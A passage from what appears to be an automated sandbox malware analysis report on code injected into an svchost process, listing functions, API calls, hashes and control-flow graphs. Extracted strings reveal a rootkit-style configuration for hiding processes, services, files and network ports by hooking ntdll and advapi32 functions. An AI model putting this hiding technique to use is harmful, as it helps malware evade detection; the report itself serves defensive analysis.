                                                                                • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction Fuzzy Hash: A3B16776250ED286EB698F35D4417F963E5FB44BC4F4860B6EE0997BA6EB35C880C340
                                                                                Function 000001F28C937D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: 315950f2970cd4e23eb0bb7edb8b7cf3ceedc3dc3316b9e43c8c6da18fa3bab3
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: C2313B72245FC19AEB609F60E8807FD73A5F784788F48446ADA4E57B98EF38C648C710
                                                                                Function 000001F28C93D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: de600b675c99b63b07bfc61b3ea15e563d1fd6e5409b2fafadfe2c025ff4e9af
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: B7316672254FC196EB608B25E8803FE73A4F789798F540166EA9D43BA8EF38C545CB00
                                                                                Function 000001F28C931628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: c2eb12f427962f4a473e0d6cdd6568ad5d847194dadf60defaa1d10753933b52
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: A871D676250E92C6EB209F76E8906F923E4FB84BCDF046161DE4E57A69EF38C444C744
                                                                                Function 000001F28C9312BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction ID: 18f95a425c74309a6456fd4bbe7ec78cd519c13267e7c4c7f8ddd63764443e45
                                                                                • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction Fuzzy Hash: 8E512676244F85C6EB54CF62E5483BAB7E1F789BD9F048134DA4A07B68EF38C1498B00
                                                                                Function 000001F28C931D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction ID: 9487c6cd3bd73dd193c882a9535ab93ec09423b9485fe8c9d985bb2c2d5cc9fb
                                                                                • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction Fuzzy Hash: A3318F79280ECBA1EA05EBB5EC616F463A4F7043C4F88A0F3E85953576AF388259C350
                                                                                Function 000001F28C1D6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 232 1f28c1d6910-1f28c1d6916 233 1f28c1d6951-1f28c1d695b 232->233 234 1f28c1d6918-1f28c1d691b 232->234 235 1f28c1d6a78-1f28c1d6a8d 233->235 236 1f28c1d691d-1f28c1d6920 234->236 237 1f28c1d6945-1f28c1d6984 call 1f28c1d6fc0 234->237 241 1f28c1d6a8f 235->241 242 1f28c1d6a9c-1f28c1d6ab6 call 1f28c1d6e54 235->242 239 1f28c1d6938 __scrt_dllmain_crt_thread_attach 236->239 240 1f28c1d6922-1f28c1d6925 236->240 255 1f28c1d698a-1f28c1d699f call 1f28c1d6e54 237->255 256 1f28c1d6a52 237->256 244 1f28c1d693d-1f28c1d6944 239->244 246 1f28c1d6931-1f28c1d6936 call 1f28c1d6f04 240->246 247 1f28c1d6927-1f28c1d6930 240->247 248 1f28c1d6a91-1f28c1d6a9b 241->248 253 1f28c1d6aef-1f28c1d6b20 call 1f28c1d7190 242->253 254 1f28c1d6ab8-1f28c1d6aed call 1f28c1d6f7c call 1f28c1d6e1c call 1f28c1d7318 call 1f28c1d7130 call 1f28c1d7154 call 1f28c1d6fac 242->254 246->244 264 1f28c1d6b31-1f28c1d6b37 253->264 265 1f28c1d6b22-1f28c1d6b28 253->265 254->248 267 1f28c1d6a6a-1f28c1d6a77 call 1f28c1d7190 255->267 268 1f28c1d69a5-1f28c1d69b6 call 1f28c1d6ec4 255->268 259 1f28c1d6a54-1f28c1d6a69 256->259 270 1f28c1d6b7e-1f28c1d6b94 call 1f28c1d268c 264->270 271 1f28c1d6b39-1f28c1d6b43 264->271 265->264 269 1f28c1d6b2a-1f28c1d6b2c 265->269 267->235 285 1f28c1d6a07-1f28c1d6a11 call 1f28c1d7130 268->285 286 1f28c1d69b8-1f28c1d69dc call 1f28c1d72dc call 1f28c1d6e0c call 1f28c1d6e38 call 1f28c1dac0c 268->286 275 1f28c1d6c1f-1f28c1d6c2c 269->275 288 1f28c1d6bcc-1f28c1d6bce 270->288 289 1f28c1d6b96-1f28c1d6b98 270->289 276 1f28c1d6b4f-1f28c1d6b5d call 1f28c1e5780 271->276 277 1f28c1d6b45-1f28c1d6b4d 271->277 282 1f28c1d6b63-1f28c1d6b78 call 1f28c1d6910 276->282 299 1f28c1d6c15-1f28c1d6c1d 276->299 277->282 282->270 282->299 285->256 308 1f28c1d6a13-1f28c1d6a1f call 1f28c1d7180 285->308 286->285 335 1f28c1d69de-1f28c1d69e5 __scrt_dllmain_after_initialize_c 286->335 297 1f28c1d6bd0-1f28c1d6bd3 288->297 298 1f28c1d6bd5-1f28c1d6bea call 1f28c1d6910 288->298 289->288 296 1f28c1d6b9a-1f28c1d6bbc call 1f28c1d268c call 1f28c1d6a78 289->296 296->288 329 1f28c1d6bbe-1f28c1d6bc6 call 1f28c1e5780 296->329 297->298 297->299 298->299 317 1f28c1d6bec-1f28c1d6bf6 298->317 299->275 319 1f28c1d6a21-1f28c1d6a2b call 1f28c1d7098 308->319 320 1f28c1d6a45-1f28c1d6a50 308->320 323 1f28c1d6c01-1f28c1d6c11 call 1f28c1e5780 317->323 324 1f28c1d6bf8-1f28c1d6bff 317->324 319->320 334 1f28c1d6a2d-1f28c1d6a3b 319->334 320->259 323->299 324->299 329->288 334->320 335->285 336 1f28c1d69e7-1f28c1d6a04 call 1f28c1dabc8 335->336 336->285
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3366878144.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 3ae14674ec2a8346f3f84ed9e0c01df585913646f7da2965e941060b61735599
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: F581F0717C0E038AFA54DB66A4C03F96ED0AB85BC0F448935FB498379ADB38E8458700
                                                                                Function 000001F28C93CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 000001F28C93CE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CEBC
                                                                                • SetLastError.KERNEL32 ref: 000001F28C93CED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,000001F28C93ECCC,?,?,?,?,000001F28C93BF9F,?,?,?,?,?,000001F28C937AB0), ref: 000001F28C93CF2C
                                                                                  • Part of subcall function 000001F28C93D6CC: HeapAlloc.KERNEL32 ref: 000001F28C93D721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF54
                                                                                  • Part of subcall function 000001F28C93D744: HeapFree.KERNEL32 ref: 000001F28C93D75A
                                                                                  • Part of subcall function 000001F28C93D744: GetLastError.KERNEL32 ref: 000001F28C93D764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF76
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: c1dccc9a58c3acbe364e99b3de5aaac7dedc88dfaa24f6078136831367b18d4b
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: 274149713C1EC782FA68A73159553FA22C25B84BF4F2C27B4E836076E6EF3998018200
                                                                                Function 000001F28C932244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: 57cb264d3990d0bdc8e496bdce57bc45f54469c11ba177c15f029bb998e39be8
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: BE213876658E82C2EB209B25F4443BA67E0F789BE5F544265EA5907AA8DF3CC149CB00
                                                                                Function 000001F28C1D9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 490 1f28c1d9944-1f28c1d99ac call 1f28c1da814 493 1f28c1d9e13-1f28c1d9e1b call 1f28c1dbb48 490->493 494 1f28c1d99b2-1f28c1d99b5 490->494 494->493 495 1f28c1d99bb-1f28c1d99c1 494->495 497 1f28c1d9a90-1f28c1d9aa2 495->497 498 1f28c1d99c7-1f28c1d99cb 495->498 500 1f28c1d9aa8-1f28c1d9aac 497->500 501 1f28c1d9d63-1f28c1d9d67 497->501 498->497 502 1f28c1d99d1-1f28c1d99dc 498->502 500->501 505 1f28c1d9ab2-1f28c1d9abd 500->505 503 1f28c1d9da0-1f28c1d9daa call 1f28c1d8a34 501->503 504 1f28c1d9d69-1f28c1d9d70 501->504 502->497 506 1f28c1d99e2-1f28c1d99e7 502->506 503->493 516 1f28c1d9dac-1f28c1d9dcb call 1f28c1d6d40 503->516 504->493 507 1f28c1d9d76-1f28c1d9d9b call 1f28c1d9e1c 504->507 505->501 509 1f28c1d9ac3-1f28c1d9aca 505->509 506->497 510 1f28c1d99ed-1f28c1d99f7 call 1f28c1d8a34 506->510 507->503 513 1f28c1d9ad0-1f28c1d9b07 call 1f28c1d8e10 509->513 514 1f28c1d9c94-1f28c1d9ca0 509->514 510->516 524 1f28c1d99fd-1f28c1d9a28 call 1f28c1d8a34 * 2 call 1f28c1d9124 510->524 513->514 529 1f28c1d9b0d-1f28c1d9b15 513->529 514->503 517 1f28c1d9ca6-1f28c1d9caa 514->517 521 1f28c1d9cba-1f28c1d9cc2 517->521 522 1f28c1d9cac-1f28c1d9cb8 call 1f28c1d90e4 517->522 521->503 528 1f28c1d9cc8-1f28c1d9cd5 call 1f28c1d8cb4 521->528 522->521 538 1f28c1d9cdb-1f28c1d9ce3 522->538 558 1f28c1d9a2a-1f28c1d9a2e 524->558 559 1f28c1d9a48-1f28c1d9a52 call 1f28c1d8a34 524->559 528->503 528->538 530 1f28c1d9b19-1f28c1d9b4b 529->530 535 1f28c1d9b51-1f28c1d9b5c 530->535 536 1f28c1d9c87-1f28c1d9c8e 530->536 535->536 539 1f28c1d9b62-1f28c1d9b7b 535->539 536->514 536->530 540 1f28c1d9df6-1f28c1d9e12 call 1f28c1d8a34 * 2 call 1f28c1dbaa8 538->540 541 1f28c1d9ce9-1f28c1d9ced 538->541 543 1f28c1d9b81-1f28c1d9bc6 call 1f28c1d90f8 * 2 539->543 544 1f28c1d9c74-1f28c1d9c79 539->544 540->493 545 1f28c1d9cef-1f28c1d9cfe call 1f28c1d90e4 541->545 546 1f28c1d9d00 541->546 571 1f28c1d9bc8-1f28c1d9bee call 1f28c1d90f8 call 1f28c1da038 543->571 572 1f28c1d9c04-1f28c1d9c0a 543->572 550 1f28c1d9c84 544->550 554 1f28c1d9d03-1f28c1d9d0d call 1f28c1da8ac 545->554 546->554 550->536 554->503 569 1f28c1d9d13-1f28c1d9d61 call 1f28c1d8d44 call 1f28c1d8f50 554->569 558->559 563 1f28c1d9a30-1f28c1d9a3b 558->563 559->497 575 1f28c1d9a54-1f28c1d9a74 call 1f28c1d8a34 * 2 call 1f28c1da8ac 559->575 563->559 568 1f28c1d9a3d-1f28c1d9a42 563->568 568->493 568->559 569->503 591 1f28c1d9bf0-1f28c1d9c02 571->591 592 1f28c1d9c15-1f28c1d9c72 call 1f28c1d9870 571->592 579 1f28c1d9c7b 572->579 580 1f28c1d9c0c-1f28c1d9c10 572->580 596 1f28c1d9a8b 575->596 597 1f28c1d9a76-1f28c1d9a80 call 1f28c1da99c 575->597 581 1f28c1d9c80 579->581 580->543 581->550 591->571 591->572 592->581 596->497 600 1f28c1d9df0-1f28c1d9df5 call 1f28c1dbaa8 597->600 601 1f28c1d9a86-1f28c1d9def call 1f28c1d86ac call 1f28c1da3f4 call 1f28c1d88a0 597->601 600->540 601->600
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3366878144.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: a9609446f00a766f3d3b655ef47b5d2ff7605ba4997714f758606ca2dc9d6f4c
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: 38E15672644F828AEB609F65E4803ED7BE0F755BD8F104125EB8957B9ACF38E491C740
                                                                                Function 000001F28C93A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 611 1f28c93a544-1f28c93a5ac call 1f28c93b414 614 1f28c93aa13-1f28c93aa1b call 1f28c93c748 611->614 615 1f28c93a5b2-1f28c93a5b5 611->615 615->614 616 1f28c93a5bb-1f28c93a5c1 615->616 618 1f28c93a5c7-1f28c93a5cb 616->618 619 1f28c93a690-1f28c93a6a2 616->619 618->619 623 1f28c93a5d1-1f28c93a5dc 618->623 621 1f28c93a963-1f28c93a967 619->621 622 1f28c93a6a8-1f28c93a6ac 619->622 626 1f28c93a969-1f28c93a970 621->626 627 1f28c93a9a0-1f28c93a9aa call 1f28c939634 621->627 622->621 624 1f28c93a6b2-1f28c93a6bd 622->624 623->619 625 1f28c93a5e2-1f28c93a5e7 623->625 624->621 630 1f28c93a6c3-1f28c93a6ca 624->630 625->619 631 1f28c93a5ed-1f28c93a5f7 call 1f28c939634 625->631 626->614 628 1f28c93a976-1f28c93a99b call 1f28c93aa1c 626->628 627->614 637 1f28c93a9ac-1f28c93a9cb call 1f28c937940 627->637 628->627 634 1f28c93a894-1f28c93a8a0 630->634 635 1f28c93a6d0-1f28c93a707 call 1f28c939a10 630->635 631->637 645 1f28c93a5fd-1f28c93a628 call 1f28c939634 * 2 call 1f28c939d24 631->645 634->627 638 1f28c93a8a6-1f28c93a8aa 634->638 635->634 649 1f28c93a70d-1f28c93a715 635->649 642 1f28c93a8ac-1f28c93a8b8 call 1f28c939ce4 638->642 643 1f28c93a8ba-1f28c93a8c2 638->643 642->643 658 1f28c93a8db-1f28c93a8e3 642->658 643->627 648 1f28c93a8c8-1f28c93a8d5 call 1f28c9398b4 643->648 679 1f28c93a648-1f28c93a652 call 1f28c939634 645->679 680 1f28c93a62a-1f28c93a62e 645->680 648->627 648->658 654 1f28c93a719-1f28c93a74b 649->654 655 1f28c93a887-1f28c93a88e 654->655 656 1f28c93a751-1f28c93a75c 654->656 655->634 655->654 656->655 660 1f28c93a762-1f28c93a77b 656->660 661 1f28c93a8e9-1f28c93a8ed 658->661 662 1f28c93a9f6-1f28c93aa12 call 1f28c939634 * 2 call 1f28c93c6a8 658->662 664 1f28c93a874-1f28c93a879 660->664 665 1f28c93a781-1f28c93a7c6 call 1f28c939cf8 * 2 660->665 666 1f28c93a900 661->666 667 1f28c93a8ef-1f28c93a8fe call 1f28c939ce4 661->667 662->614 670 1f28c93a884 664->670 692 1f28c93a804-1f28c93a80a 665->692 693 1f28c93a7c8-1f28c93a7ee call 1f28c939cf8 call 1f28c93ac38 665->693 675 1f28c93a903-1f28c93a90d call 1f28c93b4ac 666->675 667->675 670->655 675->627 690 1f28c93a913-1f28c93a961 call 1f28c939944 call 1f28c939b50 675->690 679->619 696 1f28c93a654-1f28c93a674 call 1f28c939634 * 2 call 1f28c93b4ac 679->696 680->679 684 1f28c93a630-1f28c93a63b 680->684 684->679 689 1f28c93a63d-1f28c93a642 684->689 689->614 689->679 690->627 700 1f28c93a80c-1f28c93a810 692->700 701 1f28c93a87b 692->701 712 1f28c93a815-1f28c93a872 call 1f28c93a470 693->712 713 1f28c93a7f0-1f28c93a802 693->713 717 1f28c93a676-1f28c93a680 call 1f28c93b59c 696->717 718 1f28c93a68b 696->718 700->665 702 1f28c93a880 701->702 702->670 712->702 713->692 713->693 721 1f28c93a686-1f28c93a9ef call 1f28c9392ac call 1f28c93aff4 call 1f28c9394a0 717->721 722 1f28c93a9f0-1f28c93a9f5 call 1f28c93c6a8 717->722 718->619 721->722 722->662
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction ID: e40025dd339e04ccce31ab42e6e43acdbfcb282d0efd4a44ebad16c513d6860d
                                                                                • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction Fuzzy Hash: 51E17A72640B828AEB209BB598803FD77E0F755BE8F196166EE8957B99CF34C481C701
                                                                                Function 000001F28C93F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction ID: 13c93742e32ee18173703abb3e1a129c63d5b1ec7d71d03a5c5f3c659c718adc
                                                                                • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction Fuzzy Hash: 1E41AF72391E82D1EB16CB76A9087F623D1FB49BE0F0962B9DD0A87785EF39C4458314
                                                                                Function 000001F28C93104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: e61549d0980b68c844d3942048ca76a1816c2b656e0948ec105a341f4de0e688
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: 2D412A72254FC5CAE760CF61E4447EA77E1F389B99F448129DA8907B58EF38C589CB40
                                                                                Function 000001F28C93D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D087
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: 5dc8ff007fbd2db76a624d83063225198278ec11a387f4125d1c2f12366c8b68
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: D2119332794EC782FA68973565613FA62C95B44BF4F1C63F4E839076EADF38C4028200
                                                                                Function 000001F28C937510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
